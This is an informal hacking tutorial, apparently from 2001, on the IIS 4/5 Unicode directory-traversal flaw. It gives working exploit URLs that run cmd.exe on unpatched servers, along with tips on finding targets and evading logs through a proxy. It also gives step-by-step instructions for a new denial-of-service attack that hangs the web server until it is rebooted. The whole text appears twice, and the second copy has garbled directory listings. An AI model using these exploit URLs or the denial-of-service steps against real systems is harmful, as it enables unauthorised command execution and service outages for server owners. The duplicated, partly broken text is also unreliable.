Affected System For ISS Unicode
-------------------------------
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
Untested but apparently NT 4 running IIS web server
Unaffected Systems For IIS UNICODE EXPLOIT
-------------------------------------------
IIS 4.0 + NT 4 SP6/6a with out any hot-fixes according to NSFOCUS
Tested Systems For DOS
----------------------
Windows 2k,
Windows 2k SP2
I am presuming that it works on SP1, dunno about NT 4
There are patches available for the UNICODE exploit see links below
Reason For Writing This
-----------------------
The UNICODE exploit has been around for a while and i thought i would have a bit of a play with it. To my surprise i found a denial of service attack, and it is far to simple to tell u here how to do it so if you were looking for it u came to the wrong place. I wrote this tutorial so you can understand the UNICODE exploit. There are quite a few docs on the unicode exploit i hope this gives u a bit more info. This is my first tutorial i hope it makes sense... i am pretty mashed so i will try not to make too many typo's.
Overview of the UNICODE exploit
-------------------------------
I haven't done extensive testing but i have noticed slightly different results occurring on windows 2k with no service pack and sp2 dunno about sp1 sorry. Its to do with the logs and some commands don’t work but more on that l8r.
The UNICODE exploit allows intruders to run arbitrary commands with the privileges of the IUSR_machinename account.
The exploit occurs because the cgi routine within the web server decodes the address twice.
You probably going ugh what’s that mean. Well i will give u the exploit and then break it into smaller parts to explain it
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IISserver/ - This is the vulnerable website
/scripts/ - This directory has an executable privileges on the server and should be used to execute cgi scripts. If this folder doesn't exist then you may need to replace it with one that does. If the site is running cgi you can find the directory by looking at the URL that gets passed. You may need to put more ..%255c if the executable directory is in a different place. Note not all IIS servers have an executable directory.
winnt/system32/cmd.exe - allows you to run a command line. You could also try running other commands like ping, netstat, traceroute... try different stuff out.
? - this means argument. So for the URL above the argument is /C. If you do a cmd /? in a dos window you get list of arguments you can use with cmd.exe. I know this is a bad example but if you try it out you will see what i mean. You need to use this when running various commands. For example if you want to run route.exe. You would substitute cmd.exe?/c with route.exe?PRINT. I didn't realize this until i played a bit more with various dos commands. Therefor it was not in the first draft of this tutorial.
/c+ - Ok, so we know that /c is an argument for cmd.exel, so if we check the help for cmd.exe we will find out that it means "Carries out the command specified by string and then terminates" You can play about with other arguments but this is generally needed as it kill the cmd after the command is executed. The + indicates what ever follows it is the command. It is also used as a space between arguemtns.
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/..%255c..%255c - This decodes to /..\..\ What u are trying to do here is perform directory traversal. But because the IIS server checks these things you should not be able to change directories. This is where the exploit lies. As I said earlier the address gets decoded twice, so we can get around IIS checking for such things. The first time decodes it and checks it everything appears fine, the second time around the %255c gets decoded to a \
If you know anything about hexadecimal then you would realise that you are send a hex value to the server. Just like %20 means space, you have all seen that before and should have probably realised what it meant if not... you do now.
Ok so we now know that we need to send a hex value, we need to send a \ looking at a hexadecimal table you will find that \ = %5c
You might be thinking great we can use %5c as \ but we can not, why, because this is checked by IIS and it would mean that someone is trying to perform directory traversal upon the server. IIS does the right thing here and denies the user access. But luckily it gets checked twice so if we send the various hex values of %, 5, and c we should get a \ in return. You might need some paper to do some working out on so to get it clear in your head.
So using a hex table we find that
% = %25
5 = %35
c = %63
We do not need to send a hex value for each value of %5c... just as long as we finish up with %5c we will be fine.
Now we know the hex value we can put them together to get the %5c as required. There are many combinations of values to put here are a couple of examples
Combinations Break down of combination
------------ -----------------------------------------------------
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
%%35%63 % = % %35 = 5 %63 = c = %5c
%25%35%63 %25 = % %35 = 5 %63 = c = %5c
Now you know some stuff, time to try it out
-------------------------------------------
I suggest running this on a lab and not causing havoc on the net.... i know what u script kiddies are like ...
1. Find your target.... there’s around 5.9 million IIS servers around so one shouldn't be that hard to find at least one unpatched, but you should really do it in a lab . If not try searching on google for "IIS 5 server" there should be one on there not patched. Searching on google is a very lame way of finding a IIS host... try using nmap (see link l8r)
2. Type this into your web browser
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
You should get an out put like this
Directory of c:\
07/12/1999 13:00 356,925 TXTSETUP.SIF
07/12/1999 13:00 229,264 $LDR$
19/06/2001 01:48 Documents and Settings
19/06/2001 01:56 WINNT
19/06/2001 02:06 Program Files
19/06/2001 04:17 Inetpub
23/06/2001 04:12 Stuff
23/06/2001 22:13 New Folder
24/06/2001 20:53 MP3
25/06/2001 03:44 7 lard.txt
25/06/2001 04:06 11 poop.bat
25/06/2001 05:01 temp
25/06/2001 05:14 17 test.txt
26/06/2001 00:02 82 pooped.bat
26/06/2001 00:02 20 test1.bat
27/06/2001 02:54 test
27/06/2001 03:15 1,523 poop3.txt
28/06/2001 00:23 2,501 unicode1.txt
9 File(s) 590,350 bytes
10 Dir(s) 58,729,005,056 bytes free
by doing /c+dir+c:\+/s you will get a list of every file on the computer.... oops
You can also ping, traceroute and other stuff....
There is a list at the bottom of this text for more commands
Here comes a bit of a shitter
-----------------------------
Under Win2k no service pack
http://issserver/scripts/..%255c..%255cwinnt/system32/route.exe+PRINT
give the following output and no entry into the log file....
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
===========================================================================
Persistent Routes:
None
Whereas the same command under service pack 2 gives you the same results but you get logged. When ever i say logged i mean logged by the iis server and not a external logging program. I doubt they will slip past unnoticed.Trial and error comes into play quite a lot. Try out commands on your own machine first, as the chances are if you make a mistake you will get logged. The location for logs is c:\winnt\system32\logs\W3SVC# You cannot delete logs from the system as this requires admin rights. As i said above u only get IUSR_machinename rights. By default this is a member of the user group guest.
Under service pack 2 you get logged for most of the commands you use even dir, a solution is to use a proxy server to hide ur ip address, I still recommend running all these tests in a lab.
If you try
http://issserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+route PRINT you get the following
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
I don't know why this happens, i have tried putting another ? between route and print but then i get the message saying that the system could not find route?PRINT. This means that you can only use the ? once in a address. It is trial and error seeing what commands you can execute where.
Now for what u have all been waiting for the DOS attack
-------------------------------------------------------
I wonder how many script kiddies stopped reading this when i said above that i was not going to give you the dos attack. It just goes to show how lame they r. If u did read this far mr. script kiddie i know what u want so just scroll down.... u will see the command.
Knowing how easy it is to execute commands on the web server you can guess how easy this DOS attack is to implement. I was not sure whether or not to publish this info but then I thought that there are patches out there to stop the UNICODE exploit, so why not. If someone’s server goes down due to a DOS attack via the unicode exploit they should install all the patches and sort out there security. They are fools for not keeping an eye on current security issues. This UNICODE exploit is over a month old (at time of writing) but this DOS attack is fresh i.e. 26/june/2k1. I have informed microsoft and cert of this DOS attack giving them a link to this page. If they read down this far they will get the info on the DOS attack, but lazy employees may have given up when i said i wasnt going to give you the DOS attack. I hope they didn't but hey who knows. I posted a link to this on microsofts secuity news server, as i couldn't find a email address to report this exploit.
I would like to point out that this is for educational purposes only and I do not condon the use of this DOS attack. Don’t blame me if you get in the shit. U might like to note that u do not get logged with win2k,win2k SP2 dunno about win2k SP1 but i guess if you don't get logged on SP2 u won't get logged with SP1.
Could some one please confirm that with me plz.
The idea of this DOS attack is to make the system have the maximum amount of connections possible so no one else can access the server. When the sys admin checks the site in the management console it will say that the web server is up. When he checks the site he/she will see a cached copy.... opps everything looks fine. It appears everything is normal, this caught me a couple of times when checking to see if the DOS attack had occurred. Using IE if you hold shift then click on refresh, the browser will now download a fresh copy of a page, showing you that the server has crashed. I am hoping there are no sys admin who are that stupid but it would not surprise me. It is probably those same sys admin who don't patch there servers in the first place.
The only indication that some shit has gone down is when there are multiple comp.exe's in the servers windows task manager and the same if not more number of cmd.exe's. Each comp.exe takes up approx 880Kb and each cmd.exe approx 930kb. The cmd.exe's will die off slowly after about 3 or 4 mins until you are left with about 9 or 10 comp.exe's running along with all the other system processes. These cmd's and comp's cannot be killed of by task manager and under process viewer you get the message "Unable to open process" when trying to kill a process, therefore it still keeps running. I have just found a way to kill the comp.exe, if you install the administative support tools you can use the kill command to kill the comp.exe, but you can only do this while the server is not DOSed. Once the server has been DOSed you cannot kill the processes.
Hold on Hold on we will get to what u have to type in, in a second.... but first i thought you would like to know that the only way of fixing the problem is by rebooting the machine.
If you stop it in the management console and try to restart it u get the message:
Address Already in Use.
If you try restarting the World Wide Web Publishing Service you get:
Could not stop the World Wide Web Publishing Service On Local Computer
Error 1503: This service did not respond to the start or control request in a timely fashion
Follow these three simple steps
-------------------------------
1.Type the following url into your address bar and press enter
http://issserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+comp
What we are doing here is running the comp command. This is used to compare two files, but i noticed when you send this to a server the command says running in the background, with no way to kill it.
2. A message at the bottom of the web browser should say something along the lines of web site found
waiting for reply. Press stop after the message has appeared.
3. Repeat approx 15 times. You don't have to keep retyping the command you can just use the refresh button, so the URL keeps getting sent.
I have successfully DOSed the web server in 8 attempts but other times it took as much as 25, dunno why might be the way the server was setup or hardware config or possibly previous commands. To test to see if the site has gone down do that shift + refresh thingy that I recommended earlier.
This DOS attack may be used in other places where you have access not only as part of the unicode exploit..... this is untested and just a last minute thought if true plz give credit where credits due
Remember all you script kiddies this is for educational purposes only.
Hope this all made sense to at least one person. If u don't understand do a bit more reading on UNICODE and denial of service attacks. If you still don't get it give up hackin cause it ain't going to get any simpler, maybe relax and play the classic old school game chuckie egg, you know it makes sense. I don't think you are going to find an easier DOS attack for a while, well not until WindowsXP comes out anyway :)
Well thats the end of my first tutorial hope you enjoyed it.
Big Poop
poop@evilweeds.com
www.evilweeds.com
Original copy found at www.evilweeds.f2s.com/hacking/unicode1.txt
Don't blame me if you get caught doin whatever, even if i told u to do it....
would you jump in front of a bus if I told u too? well then
more info
---------
Thanks to NSFOCUS for finding the UNICODE exploit.
NSFOCUS - http://www.nsfocus.com
CERT - http://www.cert.org/advisories/CA-2001-12.html
Cyberarmy - JOIN THEM - http://www.cyberarmy.com
Nmap - http://www.insecure.org/nmap
Patch to fix Unicode Exploit - http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
Other Commands that give a response
-----------------------------------
Don't use this as a definitive guide to commands there are definitly more
Some may not work and some might require the full command with arguments ie time /t
Try doing these commands on your own machine first and see what gets logged. Then work from there
Most of these commands run from the command prompt.
Also try %0d as character return..... dunno to what success.
call c:\poop.bat
ren
chdir
date - not required privilage
copy
move
rmdir 2000 / deltree on NT dunno how to del files in dir in one go
del
assoc - list some associations
ftype - change file type
path - may help list installed programs
subst - make drives with directory paths cannot delete once made from webbrowser
type - display file
ver - get OS version
vol
set
date /T
replace
time /t
type
verify
-------------------------------
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
Untested but apparently NT 4 running IIS web server
Unaffected Systems For IIS UNICODE EXPLOIT
-------------------------------------------
IIS 4.0 + NT 4 SP6/6a with out any hot-fixes according to NSFOCUS
Tested Systems For DOS
----------------------
Windows 2k,
Windows 2k SP2
I am presuming that it works on SP1, dunno about NT 4
There are patches available for the UNICODE exploit see links below
Reason For Writing This
-----------------------
The UNICODE exploit has been around for a while and i thought i would have a bit of a play with it. To my surprise i found a denial of service attack, and it is far to simple to tell u here how to do it so if you were looking for it u came to the wrong place. I wrote this tutorial so you can understand the UNICODE exploit. There are quite a few docs on the unicode exploit i hope this gives u a bit more info. This is my first tutorial i hope it makes sense... i am pretty mashed so i will try not to make too many typo's.
Overview of the UNICODE exploit
-------------------------------
I haven't done extensive testing but i have noticed slightly different results occurring on windows 2k with no service pack and sp2 dunno about sp1 sorry. Its to do with the logs and some commands don’t work but more on that l8r.
The UNICODE exploit allows intruders to run arbitrary commands with the privileges of the IUSR_machinename account.
The exploit occurs because the cgi routine within the web server decodes the address twice.
You probably going ugh what’s that mean. Well i will give u the exploit and then break it into smaller parts to explain it
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IISserver/ - This is the vulnerable website
/scripts/ - This directory has an executable privileges on the server and should be used to execute cgi scripts. If this folder doesn't exist then you may need to replace it with one that does. If the site is running cgi you can find the directory by looking at the URL that gets passed. You may need to put more ..%255c if the executable directory is in a different place. Note not all IIS servers have an executable directory.
winnt/system32/cmd.exe - allows you to run a command line. You could also try running other commands like ping, netstat, traceroute... try different stuff out.
? - this means argument. So for the URL above the argument is /C. If you do a cmd /? in a dos window you get list of arguments you can use with cmd.exe. I know this is a bad example but if you try it out you will see what i mean. You need to use this when running various commands. For example if you want to run route.exe. You would substitute cmd.exe?/c with route.exe?PRINT. I didn't realize this until i played a bit more with various dos commands. Therefor it was not in the first draft of this tutorial.
/c+ - Ok, so we know that /c is an argument for cmd.exel, so if we check the help for cmd.exe we will find out that it means "Carries out the command specified by string and then terminates" You can play about with other arguments but this is generally needed as it kill the cmd after the command is executed. The + indicates what ever follows it is the command. It is also used as a space between arguemtns.
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/..%255c..%255c - This decodes to /..\..\ What u are trying to do here is perform directory traversal. But because the IIS server checks these things you should not be able to change directories. This is where the exploit lies. As I said earlier the address gets decoded twice, so we can get around IIS checking for such things. The first time decodes it and checks it everything appears fine, the second time around the %255c gets decoded to a \
If you know anything about hexadecimal then you would realise that you are send a hex value to the server. Just like %20 means space, you have all seen that before and should have probably realised what it meant if not... you do now.
Ok so we now know that we need to send a hex value, we need to send a \ looking at a hexadecimal table you will find that \ = %5c
You might be thinking great we can use %5c as \ but we can not, why, because this is checked by IIS and it would mean that someone is trying to perform directory traversal upon the server. IIS does the right thing here and denies the user access. But luckily it gets checked twice so if we send the various hex values of %, 5, and c we should get a \ in return. You might need some paper to do some working out on so to get it clear in your head.
So using a hex table we find that
% = %25
5 = %35
c = %63
We do not need to send a hex value for each value of %5c... just as long as we finish up with %5c we will be fine.
Now we know the hex value we can put them together to get the %5c as required. There are many combinations of values to put here are a couple of examples
Combinations Break down of combination
------------ -----------------------------------------------------
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
%%35%63 % = % %35 = 5 %63 = c = %5c
%25%35%63 %25 = % %35 = 5 %63 = c = %5c
Now you know some stuff, time to try it out
-------------------------------------------
I suggest running this on a lab and not causing havoc on the net.... i know what u script kiddies are like ...
1. Find your target.... there’s around 5.9 million IIS servers around so one shouldn't be that hard to find at least one unpatched, but you should really do it in a lab . If not try searching on google for "IIS 5 server" there should be one on there not patched. Searching on google is a very lame way of finding a IIS host... try using nmap (see link l8r)
2. Type this into your web browser
http://IISserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
You should get an out put like this
Directory of c:\
07/12/1999 13:00 356,925 TXTSETUP.SIF
07/12/1999 13:00 229,264 $LDR$
19/06/2001 01:48
19/06/2001 01:56
19/06/2001 02:06
19/06/2001 04:17
23/06/2001 04:12
23/06/2001 22:13
24/06/2001 20:53
25/06/2001 03:44 7 lard.txt
25/06/2001 04:06 11 poop.bat
25/06/2001 05:01
25/06/2001 05:14 17 test.txt
26/06/2001 00:02 82 pooped.bat
26/06/2001 00:02 20 test1.bat
27/06/2001 02:54
27/06/2001 03:15 1,523 poop3.txt
28/06/2001 00:23 2,501 unicode1.txt
9 File(s) 590,350 bytes
10 Dir(s) 58,729,005,056 bytes free
by doing /c+dir+c:\+/s you will get a list of every file on the computer.... oops
You can also ping, traceroute and other stuff....
There is a list at the bottom of this text for more commands
Here comes a bit of a shitter
-----------------------------
Under Win2k no service pack
http://issserver/scripts/..%255c..%255cwinnt/system32/route.exe+PRINT
give the following output and no entry into the log file....
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
===========================================================================
Persistent Routes:
None
Whereas the same command under service pack 2 gives you the same results but you get logged. When ever i say logged i mean logged by the iis server and not a external logging program. I doubt they will slip past unnoticed.Trial and error comes into play quite a lot. Try out commands on your own machine first, as the chances are if you make a mistake you will get logged. The location for logs is c:\winnt\system32\logs\W3SVC# You cannot delete logs from the system as this requires admin rights. As i said above u only get IUSR_machinename rights. By default this is a member of the user group guest.
Under service pack 2 you get logged for most of the commands you use even dir, a solution is to use a proxy server to hide ur ip address, I still recommend running all these tests in a lab.
If you try
http://issserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+route PRINT you get the following
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
I don't know why this happens, i have tried putting another ? between route and print but then i get the message saying that the system could not find route?PRINT. This means that you can only use the ? once in a address. It is trial and error seeing what commands you can execute where.
Now for what u have all been waiting for the DOS attack
-------------------------------------------------------
I wonder how many script kiddies stopped reading this when i said above that i was not going to give you the dos attack. It just goes to show how lame they r. If u did read this far mr. script kiddie i know what u want so just scroll down.... u will see the command.
Knowing how easy it is to execute commands on the web server you can guess how easy this DOS attack is to implement. I was not sure whether or not to publish this info but then I thought that there are patches out there to stop the UNICODE exploit, so why not. If someone’s server goes down due to a DOS attack via the unicode exploit they should install all the patches and sort out there security. They are fools for not keeping an eye on current security issues. This UNICODE exploit is over a month old (at time of writing) but this DOS attack is fresh i.e. 26/june/2k1. I have informed microsoft and cert of this DOS attack giving them a link to this page. If they read down this far they will get the info on the DOS attack, but lazy employees may have given up when i said i wasnt going to give you the DOS attack. I hope they didn't but hey who knows. I posted a link to this on microsofts secuity news server, as i couldn't find a email address to report this exploit.
I would like to point out that this is for educational purposes only and I do not condon the use of this DOS attack. Don’t blame me if you get in the shit. U might like to note that u do not get logged with win2k,win2k SP2 dunno about win2k SP1 but i guess if you don't get logged on SP2 u won't get logged with SP1.
Could some one please confirm that with me plz.
The idea of this DOS attack is to make the system have the maximum amount of connections possible so no one else can access the server. When the sys admin checks the site in the management console it will say that the web server is up. When he checks the site he/she will see a cached copy.... opps everything looks fine. It appears everything is normal, this caught me a couple of times when checking to see if the DOS attack had occurred. Using IE if you hold shift then click on refresh, the browser will now download a fresh copy of a page, showing you that the server has crashed. I am hoping there are no sys admin who are that stupid but it would not surprise me. It is probably those same sys admin who don't patch there servers in the first place.
The only indication that some shit has gone down is when there are multiple comp.exe's in the servers windows task manager and the same if not more number of cmd.exe's. Each comp.exe takes up approx 880Kb and each cmd.exe approx 930kb. The cmd.exe's will die off slowly after about 3 or 4 mins until you are left with about 9 or 10 comp.exe's running along with all the other system processes. These cmd's and comp's cannot be killed of by task manager and under process viewer you get the message "Unable to open process" when trying to kill a process, therefore it still keeps running. I have just found a way to kill the comp.exe, if you install the administative support tools you can use the kill command to kill the comp.exe, but you can only do this while the server is not DOSed. Once the server has been DOSed you cannot kill the processes.
Hold on Hold on we will get to what u have to type in, in a second.... but first i thought you would like to know that the only way of fixing the problem is by rebooting the machine.
If you stop it in the management console and try to restart it u get the message:
Address Already in Use.
If you try restarting the World Wide Web Publishing Service you get:
Could not stop the World Wide Web Publishing Service On Local Computer
Error 1503: This service did not respond to the start or control request in a timely fashion
Follow these three simple steps
-------------------------------
1.Type the following url into your address bar and press enter
http://issserver/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+comp
What we are doing here is running the comp command. This is used to compare two files, but i noticed when you send this to a server the command says running in the background, with no way to kill it.
2. A message at the bottom of the web browser should say something along the lines of web site found
waiting for reply. Press stop after the message has appeared.
3. Repeat approx 15 times. You don't have to keep retyping the command you can just use the refresh button, so the URL keeps getting sent.
I have successfully DOSed the web server in 8 attempts but other times it took as much as 25, dunno why might be the way the server was setup or hardware config or possibly previous commands. To test to see if the site has gone down do that shift + refresh thingy that I recommended earlier.
This DOS attack may be used in other places where you have access not only as part of the unicode exploit..... this is untested and just a last minute thought if true plz give credit where credits due
Remember all you script kiddies this is for educational purposes only.
Hope this all made sense to at least one person. If u don't understand do a bit more reading on UNICODE and denial of service attacks. If you still don't get it give up hackin cause it ain't going to get any simpler, maybe relax and play the classic old school game chuckie egg, you know it makes sense. I don't think you are going to find an easier DOS attack for a while, well not until WindowsXP comes out anyway :)
Well thats the end of my first tutorial hope you enjoyed it.
Big Poop
poop@evilweeds.com
www.evilweeds.com
Original copy found at www.evilweeds.f2s.com/hacking/unicode1.txt
Don't blame me if you get caught doin whatever, even if i told u to do it....
would you jump in front of a bus if I told u too? well then
more info
---------
Thanks to NSFOCUS for finding the UNICODE exploit.
NSFOCUS - http://www.nsfocus.com
CERT - http://www.cert.org/advisories/CA-2001-12.html
Cyberarmy - JOIN THEM - http://www.cyberarmy.com
Nmap - http://www.insecure.org/nmap
Patch to fix Unicode Exploit - http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
Other Commands that give a response
-----------------------------------
Don't use this as a definitive guide to commands there are definitly more
Some may not work and some might require the full command with arguments ie time /t
Try doing these commands on your own machine first and see what gets logged. Then work from there
Most of these commands run from the command prompt.
Also try %0d as character return..... dunno to what success.
call c:\poop.bat
ren
chdir
date - not required privilage
copy
move
rmdir 2000 / deltree on NT dunno how to del files in dir in one go
del
assoc - list some associations
ftype - change file type
path - may help list installed programs
subst - make drives with directory paths cannot delete once made from webbrowser
type - display file
ver - get OS version
vol
set
date /T
replace
time /t
type
verify
No comments:
Post a Comment